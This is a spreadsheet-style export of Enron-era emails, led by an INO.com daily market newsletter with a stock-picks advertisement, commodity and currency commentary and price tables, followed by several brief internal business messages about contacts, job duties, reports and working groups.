http://www.ino.com/specials/icm/manfut.html_x000D_
______________________________________________________________________x000D_
_x000D_
STRAIGHTFORWARD BUY AND SELL ADVICE_x000D_
______________________________________________________________________x000D_
_x000D_
Trader Chuck LeBeau and INO.com Team Up For CELEBRITYstocks!_x000D_
http://store.ino.com/sale/1E78A/SUBCELS-TopPicks_x000D_
_x000D_
Dear Trader:_x000D_
_x000D_
Short on Time? _x000D_
_x000D_
...then prepare yourself for a few well-spent minutes per _x000D_
day as Chuck LeBeau teams up with INO.com in a first class _x000D_
stock selection service._x000D_
_x000D_
Get clear trading signals and daily market guidance. _x000D_
Trade with precise, well-researched short- and _x000D_
medium-term trades._x000D_
_x000D_
Get winning short-term trades like these:_x000D_
_x000D_
BMC Software (BMC ? NYSE)_x000D_
Long on October 16 at $15.50_x000D_
Exit on October 26 at $17.38_x000D_
12.13% Profit in 9 days!_x000D_
_x000D_
IVAX Corp (IVX ? AMEX)_x000D_
Short on November 2 at $20.18_x000D_
Exit on November 7 at $18.25_x000D_
9.56% Profit in 4 days!_x000D_
_x000D_
Starwood Hotels (HOT ? NYSE)_x000D_
Short on October 17 at $24.10_x000D_
Exit on October 22 at 21.85_x000D_
9.34% Profit in 4 days!_x000D_
_x000D_
Try CELEBRITYstocks for a month.  You can cancel at _x000D_
any time.  Chuck will email you each day's _x000D_
NEW RECOMMENDATIONS and details on today?s _x000D_
CURRENT POSITIONS._x000D_
_x000D_
Members also receive the valuable MARKET OUTLOOK and _x000D_
TRADING TACTICS reports along with state-of-the-art _x000D_
charts to keep you on top of Chuck's market selections._x000D_
_x000D_
RESERVE YOUR SPACE NOW AT:_x000D_
_x000D_
http://store.ino.com/sale/1E78A/SUBCELS-TopPicks_x000D_
_x000D_
&lt;b&gt;&lt;a href="http://store.ino.com/sale/1E78A/SUBCELS-TopPicks"&gt;CELEBRITYstocks - click to learn more!&lt;/a&gt;&lt;/b&gt;_x000D_
_x000D_
Order Toll Free 800-538-7424 - 410-867-7424_x000D_
_x000D_
All claims on third-party products are made by the publisher_x000D_
and not by INO.com. All Products Guaranteed._x000D_
_x000D_
______________________________________________________________________x000D_
_x000D_
E X T R E M E   M A R K E T   C O M M E N T A R Y_x000D_
______________________________________________________________________x000D_
_x000D_
The STOCK INDEXES http://quotes.ino.com/exchanges/?c=indexes_x000D_
_x000D_
Stock indexes closed lower on Friday due to light profit taking ahead_x000D_
of the close. The NASDAQ posted another inside day with a slightly_x000D_
lower close as it consolidates below minor resistance crossing at_x000D_
1933.94. Weekly momentum indicators remain bullish signaling that_x000D_
sideways to higher prices are possible during the last half of_x000D_
November. If the aforementioned resistance level is cleared, the 25%_x000D_
retracement level of the 2000/2001 decline crossing at 2071.93 is a_x000D_
potential target later this year. The December S&amp;P 500 index closed_x000D_
lower on Friday but held above the 50% retracement level of the_x000D_
May/September decline crossing at 1137.45. The door remains open for_x000D_
a test of the reaction high crossing at 1163.90 later this month. _x000D_
_x000D_
The Dow closed slightly lower on Friday due to light profit taking_x000D_
ahead of the weekend. Losses were limited following the release of_x000D_
today?s economic reports and ideas that the conflict in Afghanistan_x000D_
may come to an end by the end of the year. If this fall?s rebound_x000D_
continues, the 62% retracement level of this year?s decline crossing_x000D_
at 10094.10 is the Dow?s next target. _x000D_
_x000D_
INTEREST RATES http://quotes.ino.com/exchanges/?c=interest_x000D_
_x000D_
December T-bonds extended this week?s sharp sell off on Friday and_x000D_
tested the 75% retracement level of the Sept./Oct. rally crossing at_x000D_
104-29. December bonds have decline over 5 points since Tuesday._x000D_
While momentum indicators are bearish signaling that additional_x000D_
weakness is possible during the last half of November I would not be_x000D_
surprised to see a modest short covering bounce early next week._x000D_
Longer-term the door is open for a possible test of September?s low_x000D_
crossing at 102-17. _x000D_
_x000D_
The CRB INDEX http://quotes.ino.com/exchanges/?c=indexes_x000D_
_x000D_
The CRB index closed higher on Friday due to a rebound in energies,_x000D_
grains, fiber and foods. Session lows fell short of testing trendline_x000D_
support drawn across this fall?s lows. Closes below this support_x000D_
level crossing near 186 are needed to confirm that the shallow_x000D_
rebound off October?s low has ended. At the same time closes above_x000D_
this week?s high crossing at 190.46 are needed to renew this fall?s_x000D_
rally. _x000D_
_x000D_
ENERGY MARKETS http://quotes.ino.com/exchanges/?c=energy_x000D_
_x000D_
The energy markets closed higher on Friday due to short covering as_x000D_
it consolidated some of this week?s sharp losses. However, upside_x000D_
potential appears limited due to the possibility of a protracted_x000D_
fight between Russia and OPEC that could last for some time. _x000D_
_x000D_
December crude oil posted an inside day with a modestly higher close_x000D_
due to light short covering. However, December remains poised to test_x000D_
of the 75% retracement level of the 1998/2000 rally crossing at 16.83_x000D_
later this month. If this support level fails to halt this fall?s_x000D_
decline the January 1999 reaction high crossing at 13.75 is a_x000D_
possible target later this fall. Momentum indicators are bearish_x000D_
signaling that additional weakness is possible during the last half_x000D_
of November. _x000D_
_x000D_
December heating oil posted an inside day with a modestly higher_x000D_
close on Thursday due to light short covering. However, a sell off_x000D_
ahead of the close tempered some of today?s gains leaving the door_x000D_
open for sideways trading on Monday. Session highs tested broken_x000D_
support marked by the October 1999 low crossing at 53.40. If this_x000D_
week?s decline continues, the 75% retracement level of the 1999/2000_x000D_
rally crossing at 48.50 is December?s next likely target. Momentum_x000D_
indicators are bearish signaling that sideways to lower prices are_x000D_
likely into the last half of November. _x000D_
_x000D_
December unleaded gas ended higher on Friday due to light short_x000D_
covering as it consolidated some of this week?s losses. However,_x000D_
today?s short covering bounce fell short of testing broken support_x000D_
crossing at 51.87. While another day or two of short covering is_x000D_
possible, the door is open for additional weakness with the June 1999_x000D_
low crossing at 47.00 being December?s next likely target. Momentum_x000D_
indicators are bearish signaling that sideways to lower prices are_x000D_
possible near-term. _x000D_
_x000D_
December Henry Hub natural posted an upside reversal on Friday after_x000D_
spiked below October?s low crossing at 2.535. Additional strength on_x000D_
Monday is needed to confirm today?s bullish reversal pattern thereby_x000D_
increasing the odds that this week?s low marked a double bottom with_x000D_
October?s low. If the decline off October?s high continues, weekly_x000D_
fib support crossing at 2.402 is a potential target later this year._x000D_
Short-term momentum indicators are bearish but have entered their_x000D_
respective oversold zones hinting that a double bottom might be_x000D_
forming if October?s low can halt this month?s decline. _x000D_
_x000D_
CURRENCIES http://quotes.ino.com/exchanges/?c=currencies_x000D_
_x000D_
The December Dollar posted another quiet inside day with a lower_x000D_
close as it consolidates just below trading range resistance crossing_x000D_
at 116.60. Closes above Wednesday?s high at 117.05 would confirm a_x000D_
breakout above this falls trading range and could lead to a test of_x000D_
August?s reaction high crossing at 117.49 later this month._x000D_
Stochastics remain bullish signaling that sideways to higher prices_x000D_
are still possible. _x000D_
_x000D_
The December Swiss Franc closed higher on Friday as it extended its_x000D_
short covering bounce off Wednesday?s low. Monday will be a key day_x000D_
in near-term direction of the market. A higher opening followed by a_x000D_
lower close on Monday would signal that this week?s short covering_x000D_
bounce has likely come to an end. Closes below Wednesday?s low at_x000D_
.5961 would renew December?s decline and set the stage for a likely_x000D_
test of the 50% retracement level of the July/September rally_x000D_
crossing at .5944. Momentum indicators are bearish signaling that_x000D_
additional weakness is possible during the later part of November. _x000D_
_x000D_
The December Canadian Dollar closed modestly lower on Friday, as is_x000D_
consolidated above October?s broken downtrend line. Today?s mid-range_x000D_
close leaves the door open for sideways trading on Monday. If_x000D_
December extends this week?s short covering rally the 25% retracement_x000D_
level of the July/November decline crossing at .6322 is December?s_x000D_
next upside target. Momentum indicators are bullish signaling that_x000D_
sideways to higher prices are possible near-term. _x000D_
_x000D_
The December Japanese Yen closed out the week on a low note on_x000D_
Friday. However, session lows fell short of testing October?s low_x000D_
crossing at .8132. If this support level is broken thereby renewing_x000D_
December?s decline off September?s high this summer?s low crossing at_x000D_
.8060 is a potential target later this year. Stochastics and the RSI_x000D_
are bearish signaling sideways to lower prices are possible into the_x000D_
last half of November. _x000D_
_x000D_
PRECIOUS METALS http://quotes.ino.com/exchanges/?c=metals_x000D_
_x000D_
December gold posted a second consecutive close below October?s low_x000D_
on Friday thereby opening the door for a possible test of August?s_x000D_
reaction low crossing at 272.60 later this month. However, today?s_x000D_
mid-range close leaves the door open for a possible short covering_x000D_
bounce on Monday. Stochastics and the RSI are bearish signaling that_x000D_
additional weakness is possible during the last half of November. _x000D_
_x000D_
December silver posted an inside day with a lower close on Friday as_x000D_
it consolidates below broken support crossing at 4.15. Close below_x000D_
last Friday?s low crossing at 4.055 cents would renew December?s_x000D_
decline off September?s high and could lead to a possible test of_x000D_
weekly support crossing at 3.90 later this month. _x000D_
_x000D_
December copper posted a key reversal up on Friday ending Thursday?s_x000D_
correction. At the same time December will need to close above_x000D_
Thursday?s high crossing at 69.60 to renew its rebound off last_x000D_
week?s low. If the rally resumes, August?s high crossing at 70.60 is_x000D_
December?s next target. Short-term momentum indicators are bullish_x000D_
but becoming overbought hinting that a test of August?s high early_x000D_
next week could trigger a round of profit taking. _x000D_
_x000D_
GRAINS http://quotes.ino.com/exchanges/?c=grains_x000D_
_x000D_
December corn closed higher on Friday due in large part to spillover_x000D_
strength from soybeans and wheat. This morning?s export sales report_x000D_
came in at 31.9 million bushels, which was near the upper end of_x000D_
pre-report estimates but still below the pace needed to reach USDA_x000D_
export projections. Today?s high-range close sets the stage for a_x000D_
firmer opening on Monday but closes above initial gap resistance_x000D_
crossing at 2.09 1/2 are needed to trigger new buying interest in the_x000D_
market. Until then sideways trading will continue to dominate the_x000D_
market near-term. _x000D_
_x000D_
December wheat closed sharply higher on Friday as short covering_x000D_
gains were exaggerated as buy stops were hit above 2.86, which pushed_x000D_
December above last week?s high of 2.88 1/2. While a setback is_x000D_
possible on Monday due to ideas that today?s gains were overdone_x000D_
today?s rally turned a number of momentum indicators neutral to_x000D_
bullish signaling that the sell off from October?s high has come to_x000D_
an end. Today?s rally found little support from this week?s export_x000D_
sales report, which came in at 14 million bushels and well within_x000D_
pre-report estimates. _x000D_
_x000D_
SOYBEAN COMPLEX http://quotes.ino.com/exchanges/?c=grains_x000D_
_x000D_
January soybeans closed higher on Friday as bulls stepped up to the_x000D_
plate and defended their positions following this week?s breakout_x000D_
above initial gap resistance crossing at 4.44 1/. Today?s rally fell_x000D_
just short of filling October?s gap crossing at 4.53 1/2, which_x000D_
coincides with the 25% retracement level of the July/October decline_x000D_
crossing at 4.54. Closes above these key resistance levels are needed_x000D_
to open the door for a larger-degree post-harvest rebound that could_x000D_
last into the end of the year. Today?s weekly export sales report_x000D_
came in near the low end of pre-report estimates at 27.25 million_x000D_
bushels. However, expectations for improving foreign and domestic_x000D_
demand in the coming weeks along with a lack of sellers helps push_x000D_
January to new highs for the week. _x000D_
_x000D_
December soybean meal closed steady on Friday after testing the upper_x000D_
boundary of October?s trading range crossing at 167. A round of_x000D_
profit taking ahead of the close erased early gains leaving the door_x000D_
open for further consolidation on Monday. At the same time short-term_x000D_
momentum indicators remain bullish signaling sideways to higher_x000D_
prices are possible during the last half of November. Closes above_x000D_
167 could lead to a test of September?s high crossing at 171 later_x000D_
this month. _x000D_
_x000D_
LIVESTOCK http://quotes.ino.com/exchanges/?c=livestock_x000D_
_x000D_
December hogs closed sharply lower on Friday erasing the gains of the_x000D_
past three trading sessions. Much of today?s pressure in the December_x000D_
contract was due to bull spreaders dumping their positions ahead of_x000D_
the weekend. With packers covered on their needed into next_x000D_
Wednesday, weaker cash bids are expected to start the new week on_x000D_
Monday. Momentum indicators remain bearish hinting that December_x000D_
could renew its decline off last week?s high and possibly test_x000D_
October?s low at 46.70 later next week before a bottom is in place. _x000D_
_x000D_
December cattle closed higher on Friday due to short covering ahead_x000D_
of this afternoon?s cattle-on-feed report. Momentum indicators have_x000D_
turned bullish signaling that Monday?s low likely marked an important_x000D_
bottom. The late- week rebound has V-bottom written all over the_x000D_
market. This afternoon?s cattle-on-feed report was termed bearish._x000D_
The big question is whether or not the decline ahead of the report_x000D_
factored in all of today?s bearish news. I am looking for a setback_x000D_
on Monday as the market absorbs today?s negative report. Here are the_x000D_
highlights of today?s report. _x000D_
_x000D_
USDA estimate Ave. guess Range of guesses_x000D_
_x000D_
On Feed as of Nov. 1 ----- 100% 99.2% 98.0- 100.00%_x000D_
_x000D_
Placed in October -------- 97% 91.5% 87.0- 97.5%_x000D_
_x000D_
Marketed in October ------ 99% 99.1% 97.0- 100.00%_x000D_
_x000D_
FOOD &amp; FIBER http://quotes.ino.com/exchanges/?c=food_x000D_
_x000D_
December coffee posted an inside day with a higher close on Friday_x000D_
and remains poised to extend its short covering rebound off October?s_x000D_
low. Closes above Wednesday?s high at 50.00 cents would renew this_x000D_
week?s rally setting the stage for a test of August?s gap crossing at_x000D_
54.00 later this year. Momentum indicators are turning bullish_x000D_
signaling that additional gains are possible near-term. _x000D_
_x000D_
December cocoa gapped up and closed sharply higher on Friday as it_x000D_
cleared both last February?s high at 1237 and weekly fib resistance_x000D_
crossing at 1261. This week?s breakout above February?s high has_x000D_
opened the door for a possible test of the 62% retracement level of_x000D_
the 1997/2000 decline crossing at 1349 later this year. At the same_x000D_
time, if today?s gap is filled next week it would signal that a top_x000D_
has likely been posted as today?s gap was an exhaustion gap._x000D_
_x000D_
March sugar closed lower on Friday due to light profit taking ahead_x000D_
of the weekend. If the rally continues, the 50% retracement level of_x000D_
the June/October decline crossing at 755 is March?s next target._x000D_
Closes below this fall?s uptrend line crossing near 691 would confirm_x000D_
that a short-term top has been posted. Weekly momentum indicators_x000D_
remain bullish signaling that sideways to higher prices are possible_x000D_
into late-November._x000D_
_x000D_
December cotton closed higher on Friday supported by this week?s_x000D_
stellar export sales report that came in at 455,200 bales, the_x000D_
strongest of the marketing year. Nevertheless, December failed to_x000D_
exceed this week?s high at 35.60 and closed mid-range on the day._x000D_
This leaves the door open for sideways trading on Monday. Closes_x000D_
below Thursday?s low at 33.40 could trigger new selling, which could_x000D_
end the late fall rally. If the rally resumes, fib resistance_x000D_
crossing at 37.25 is December?s next target. Momentum indicators are_x000D_
bullish but nearing their respective overbought zones warning traders_x000D_
to use caution as a short-term top might be near. _x000D_
_x000D_
Daily Extreme Commentary is brought to you by GLOBALcharts, _x000D_
INO.com's end-of-day charting software for Futures, Futures _x000D_
Options and Optionable Stocks. http://www.globalcharts.com_x000D_
Search the INO Store  - http://store.ino.com/_x000D_
______________________________________________________________________x000D_
_x000D_
I N O   N E W S   _x000D_
______________________________________________________________________x000D_
_x000D_
_x000D_
Pacific Exchange Adds 90 Options To B-D Auto-Ex Program_x000D_
   http://news.ino.com/press/?release=27523_x000D_
WTC Gold Re-Located And Eligible For NYMEX Deliveries_x000D_
   http://news.ino.com/press/?release=27522_x000D_
Tel Aviv Stock Exchange To Launch Euro-Shekel Derivatives_x000D_
   http://news.ino.com/press/?release=27521_x000D_
CME Records Busiest Ever Day, Sets Open Interest Record_x000D_
   http://news.ino.com/press/?release=27520_x000D_
Hong Kong Reduces Levies On Stock Futures Contracts_x000D_
   http://news.ino.com/press/?release=27519_x000D_
_x000D_
_____________________________________________________________________________x000D_
_x000D_
E X T R E M E   F U T U R E S_x000D_
_____________________________________________________________________________x000D_
_x000D_
Updated every 10 minutes around the clock._x000D_
More at http://quotes.ino.com/analysis/extremes/futures/_x000D_
_x000D_
WINNERS_x000D_
_x000D_
PNM2   Propane Jun 2002                           0.3150    0.0200  +6.78_x000D_
HOX2   Heating Oil Nov 2002                       0.5656    0.0298  +5.42_x000D_
PAZ1   Palladium Dec 2001                         342.00     16.05  +4.92_x000D_
CCZ1   Cocoa Dec 2001                               1285        54  +4.37_x000D_
LBN2   Random Length Lumber Jul 2002              246.00     10.00  +4.15_x000D_
DBZ1   Butter Dec 2001                           140.000     5.000  +3.70_x000D_
NGZ1   Henry Hub Natural Gas Dec 2001              2.637     0.094  +3.68_x000D_
SCF2   Brent Crude Oil Jan 2002                    17.76      0.63  +3.64_x000D_
CLZ1   Light Sweet Crude Oil Dec 2001              18.03      0.62  +3.55_x000D_
XWZ1   Wheat Dec 2001                            289 1/4     9 3/4  +3.48_x000D_
_x000D_
LOSERS_x000D_
_x000D_
QLN2   Central Appalachian Coal Jul 2002           30.50     -1.50  -4.69_x000D_
LHZ1   Lean Hogs Dec 2001                         48.050    -1.375  -2.78_x000D_
RRH2   Rough Rice Mar 2002                         4.160    -0.090  -2.12_x000D_
XHZ1   Lean Hogs Dec 2001                          48.05     -1.02  -2.06_x000D_
CLZ5   Light Sweet Crude Oil Dec 2005              20.89     -0.33  -1.62_x000D_
PNZ1   Propane Dec 2001                           0.3100   -0.0050  -1.59_x000D_
PBN2   Frozen Pork Bellies Jul 2002               74.500    -1.000  -1.32_x000D_
TUH2   Treasury Notes 2yr Mar 2002             104 19/64    -87/64  -1.30_x000D_
ZBH2   U.S. Treasury Bond Mar 2002             104 02/32  -1 06/32  -1.13_x000D_
ZTZ1   Treasury Notes 2yr Dec 2001             104 56/64    -72/64  -1.07_x000D_
_x000D_
*TWO FREE VIDEOS ON OPTIONS TRADING! _x000D_
Learn How To Optimize Your Stock Portfolio With Options _x000D_
http://www.ino.com/specials/oic/video.html_x000D_
_____________________________________________________________________________x000D_
_x000D_
E X T R E M E   S T O C K S_x000D_
_____________________________________________________________________________x000D_
_x000D_
Updated every 10 minutes around the clock._x000D_
More at http://quotes.ino.com/analysis/extremes/stocks/_x000D_
_x000D_
WINNERS_x000D_
_x000D_
TESTV  TEST SECURITY                             42.6300   11.0100  +34.82_x000D_
TESTA  TEST SECURITY                            120.4100   30.2100  +33.49_x000D_
ITXC   ITXC CORP                                  5.7200    1.4700  +33.18_x000D_
AMIE   AMBASSADORS INTL                          19.4900    4.1500  +26.84_x000D_
U      US AIRWAYS GROUP                             6.97      1.27  +22.28_x000D_
MRVC   MRV COMMUNICATIONS                         5.2100    0.9300  +21.53_x000D_
DNCR   DYNACARE INC                              13.1500    2.3200  +21.32_x000D_
BRLI   BIO-REFERENCE LABS                         6.4000    1.0600  +19.67_x000D_
DOC    MEDICAL ADVISORY SYSTEMS INC                 7.90      1.25  +18.80_x000D_
RBAK   REDBACK NETWORKS INC                       5.3000    0.8000  +17.86_x000D_
_x000D_
LOSERS_x000D_
_x000D_
FLIR   FLIR SYS INC                              34.3400   -7.0400  -17.17_x000D_
VINT   GOLDEN STATE VINTNERS'B'                   5.5000   -0.8200  -14.91_x000D_
AEOS   AMER EAGLE OUTFITTERS INC                 26.2700   -4.2900  -14.07_x000D_
FC     FRANKLIN COVEY                               6.06     -0.95  -13.57_x000D_
ATPG   ATP OIL &amp; GAS                              5.2900   -0.7100  -12.35_x000D_
SSPX   SSP SOLUTIONS INC                          5.1800   -0.6700  -11.75_x000D_
IMCO   IMPCO TECHNOLOGIES                        14.3000   -1.8500  -11.60_x000D_
MAGS   MAGAL SECURITY SYSTEMS LTD                 7.1800   -0.8900  -11.37_x000D_
RMCI   RIGHT MGMT CONSULTANTS                    21.9300   -2.8800  -11.28_x000D_
CTRA   CENTRA SOFTWARE                            6.8000   -0.8400  -11.05_x000D_
______________________________________________________________________x000D_
_x000D_
T H A N K   Y O U_x000D_
______________________________________________________________________x000D_
_x000D_
Thank you for subscribing to the Extreme Markets Daily Digest from INO.com_x000D_
( http://www.ino.com/ ). If you want to subscribe to our other email_x000D_
services, or would like to modify your profile please visit_x000D_
http://www.ino.com/email/._x000D_
_x000D_
To subscribe a friend, visit:_x000D_
  http://www.ino.com/email/_x000D_
_x000D_
To unsubscribe, visit:_x000D_
  http://www.ino.com/email/remove/?email=mike.grigsby@enron.com&amp;list=evening_x000D_
_x000D_
--_x000D_
Copyright 1998-2001 INO.com. All Rights Reserved.</t>
  </si>
  <si>
    <t>Fri, 24 Sep 1999 07:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Global Standards - Bulk Power</t>
  </si>
  <si>
    <t xml:space="preserve">Steve,_x000D_
_x000D_
In addition to Perot Systems, I would contact:_x000D_
_x000D_
ABB_x000D_
Ralph Masiello_x000D_
Vice President &amp; General Manager_x000D_
Systems Control Division in Santa Clara_x000D_
408-988-3200_x000D_
_x000D_
Siemens - I am still working on the right person to contact._x000D_
_x000D_
These guys are major global players in the power industry and have a lot of _x000D_
investment in software  and systems.  They clearly would have an interest in _x000D_
setting the rules.  _x000D_
_x000D_
If you would like me call them and begin the dialogue, let me know._x000D_
_x000D_
Jeff_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 13:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'donna.scott@enron.com', 'steven.january@enron.com', 'rick.dietz@enron.com', 'sheila.nacey@enron.com'})</t>
  </si>
  <si>
    <t>Duties</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.  These are Ava's duties as we defined last year.  Thanks. Lynn_x000D_
---------------------- Forwarded by Lynn Blair/ET&amp;S/Enron on 05/29/2001 10:52 AM ---------------------------_x000D_
   Lynn Blair                08/07/2000 09:23 AM_x000D_
_x000D_
To:	Sharon Brown/ET&amp;S/Enron@ENRON, Patti Rumler/ET&amp;S/Enron@ENRON, Alma Carrillo/ET&amp;S/Enron@ENRON, Ricki Winters/ET&amp;S/Enron@Enron, Julia White/ET&amp;S/Enron@ENRON, Lynn Blair/ET&amp;S/Enron@ENRON, Sheila Nacey/ET&amp;S/Enron@ENRON, Steven January/ET&amp;S/Enron@ENRON, Rick Dietz/ET&amp;S/Enron@ENRON, Larry Berger/ET&amp;S/Enron@ENRON, Raetta Zadow/ET&amp;S/Enron@ENRON, Jan Moore/ET&amp;S/Enron@ENRON, John Buchanan/ET&amp;S/Enron@ENRON, Lynn Blair/ET&amp;S/Enron@ENRON_x000D_
cc:	Lynn Blair/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject:	Duties_x000D_
_x000D_
Attached are the Job Duties the Assistance of helped me structure for Ava's desk._x000D_
I will be handing this list out to the teams at the next team leader meeting._x000D_
If you have any questions, please let me know.  Thanks. Lynn_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 3 May 2000 02:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Doorstep Report</t>
  </si>
  <si>
    <t xml:space="preserve">Don't know if you received this or not, version of Doorstep as presented to _x000D_
Sherriff..._x000D_
_x000D_
---------------------- Forwarded by Brent A Price/HOU/ECT on 05/03/2000 09:11 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Rebecca Morrill_x000D_
05/03/2000 02:01 PM_x000D_
To: Brent A Price/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Doorstep Report_x000D_
_x000D_
Brent_x000D_
_x000D_
Doorstep report as presented to John Sheriff._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Jan 2000 07:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeff.dasovich@enron.com', 'kathleen.magruder@enron.com', 'steve.montovano@enron.com', 'ricardo.charvel@enron.com', 'robert.hemstock@enron.com', 'roy.boston@enron.com'})</t>
  </si>
  <si>
    <t>Cross Border Opportunities Group</t>
  </si>
  <si>
    <t xml:space="preserve">I just want to confirm how we have agreed to proceed:_x000D_
We will start our work focussing on " b)  Commercially Significant _x000D_
Interfaces"  rather than "a) Identification  etc." , on the understanding  _x000D_
that our work on the regional issues may shift into a discussion of  a). _x000D_
We will work in three sub-groups:  Northeast (Roy Boston, Steve Montovano, _x000D_
Aleck Dadson), South (Ricardo Charvel, Kathleen Magruder, Jeff Dasovich) and  _x000D_
Northwest (Rob Hemstock and one or both of Jeff Dasovich / Mary Hain*).     * _x000D_
I will approach Mary Hain to join the group and work in the Northwest _x000D_
subgroup. _x000D_
Each subgroup will produce a workplan  and focus document by the end of _x000D_
February.  Those three documents  will be circulated to the whole group and  _x000D_
discussed on a conference call for the whole group  in the first week in _x000D_
March.  _x000D_
Each subgroup will make their own  determination about  how they will  carry _x000D_
out their work:  meetings, telephone calls, e-mail, etc.; but the  group will _x000D_
endeavour to do all  of its group-level  work by e-mail and telephone. _x000D_
We will aim to have a work product to deliver from the group  by May.  At _x000D_
this stage, it is likely that the final work product will consist of a _x000D_
document  or documents  identifying impediments and opportunities and  the _x000D_
ways of mitigating/pursuing them.  However, as we discussed on the call, we _x000D_
should keep an open mind about the nature of the work product.  We will have _x000D_
a better idea of what work product to aim for after the completion/review  of _x000D_
the initial workplans. </t>
  </si>
  <si>
    <t>Fri, 25 Aug 2000 11:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Power Market Overview</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Don Miller/HOU/ECT on 08/25/2000 06:27 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Mukherjee, Gautam" &lt;GautamMukherjee@ICFConsulting.com&gt; on 08/25/2000 _x000D_
05:00:19 PM_x000D_
To: "Don Miller (E-mail)" &lt;Don.Miller@enron.com&gt;_x000D_
cc: "Fusco, Maria" &lt;MariaFusco@ICFConsulting.com&gt;, "Leitz, Thomas" _x000D_
&lt;ThomasLeitz@ICFConsulting.com&gt; _x000D_
Subject: Power Market Overview_x000D_
_x000D_
_x000D_
Hi Don,_x000D_
 Attached is the updated version of the Power Market_x000D_
Overview. Please don't hesitate to call us if you have any_x000D_
questions._x000D_
_x000D_
_x000D_
 &lt;&lt;Power Market Overview.doc&gt;&gt;_x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
_x000D_
Gautam Mukherjee_x000D_
Senior Associate_x000D_
ICF Consulting_x000D_
gmukherjee@icfconsulting.com_x000D_
Voice (703) 934 - 3547_x000D_
Fax (703) 934 - 3968_x000D_
_x000D_
_x000D_
 - Power Market Overview.doc_x000D_
</t>
  </si>
  <si>
    <t>Thu, 2 Nov 2000 05:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: It's PRC time again</t>
  </si>
  <si>
    <t xml:space="preserve">Steve,_x000D_
_x000D_
I would,  with pleasure._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Steven Leppard_x000D_
11/02/2000 04:09 AM_x000D_
To: _x000D_
cc:  (bcc: Vince J Kaminski/HOU/ECT)_x000D_
Subject: It's PRC time again_x000D_
_x000D_
Hi - I wonder if you'd consider acting as a PRC reviewer for me?_x000D_
_x000D_
Cheers,_x000D_
Steve_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 Jan 2002 05:44:03 -0800 (PST)</t>
  </si>
  <si>
    <t>daily hoil &amp; unlded 1/18</t>
  </si>
  <si>
    <t xml:space="preserve">The information contained herein is based on sources that we believe to be_x000D_
reliable, but we do not represent that it is accurate or complete.  Nothing_x000D_
contained herein should be considered as an offer to sell or a solicitation_x000D_
of an offer to buy any financial instruments discussed herein.  Any_x000D_
opinions expressed herein are solely those of the author.  As such, they_x000D_
may differ in material respects from those of, or expressed or published by_x000D_
on behalf of Carr Futures or its officers, directors, employees or_x000D_
affiliates.  ? 2001 Carr Futures_x000D_
_x000D_
_x000D_
The charts are now available on the web by clicking on the hot link(s)_x000D_
contained in this email. If for any reason you are unable to receive the_x000D_
charts via the web, please contact me via email and I will email the charts_x000D_
to you as attachments._x000D_
_x000D_
_x000D_
_x000D_
Distillate     http://www.carrfut.com/research/Energy1/hoil18.pdf_x000D_
Unleaded     http://www.carrfut.com/research/Energy1/unlded18.pdf_x000D_
_x000D_
_x000D_
Scott Mollner Recommendation_x000D_
http://www.carrfut.com/research/Energy1/recom2-18-02.pdf_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 02:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bjorn.hagelmann@enron.com', 'jeff.blumenthal@enron.com', 'susan.musch@enron.com', 'harry.collins@enron.com', 'charlie.hoang@enron.com', 'matthew.gockerman@enron.com', 'shari.mao@enron.com', 'tom.moran@enron.com'})</t>
  </si>
  <si>
    <t>Clickpaper Financial Descriptions</t>
  </si>
  <si>
    <t xml:space="preserve">Please review the Financial Swap descriptions on the attached word document _x000D_
for the Clickpaper products.  The two descriptions in red text are existing _x000D_
product types in Enron Online.  In each other description, the text you see _x000D_
in blue is the only portion that changes in the product type description from _x000D_
commodity to commodity.  As the product types are created in the Enron Online _x000D_
Production database, your approval will be requested.  The purpose of this _x000D_
email is to provide you with advance notice so the approval process can be _x000D_
executed quickly.  Please contact me with questions or concerns._x000D_
_x000D_
Thank you._x000D_
Kevin_x000D_
3-9555_x000D_
</t>
  </si>
  <si>
    <t>Thu, 27 Jan 2000 08:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Ami Chokshi/Corp/Enron on 01/27/2000 _x000D_
04:16 PM ---------------------------_x000D_
_x000D_
_x000D_
troy_a_benoit@reliantenergy.com on 01/27/2000 03:53:02 PM_x000D_
To: Ami Chokshi/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
(See attached file: egmnom-Feb.xls)_x000D_
_x000D_
 - egmnom-Feb.xls_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Sep 2000 09:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Correction - Japan Working Group Minutes</t>
  </si>
  <si>
    <t xml:space="preserve">Please disregard my previous note.  This one has the minutes from today's _x000D_
meeting attached.  I'll forward the Singapore presentation and the Japan gas _x000D_
comments in the near future._x000D_
_x000D_
Please let me know if there is anything you'd like to add to the agenda for _x000D_
the next meeting._x000D_
_x000D_
Mike_x000D_
_x000D_
813-5219-4584_x000D_
</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 08:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jakeifer@aep.com'})</t>
  </si>
  <si>
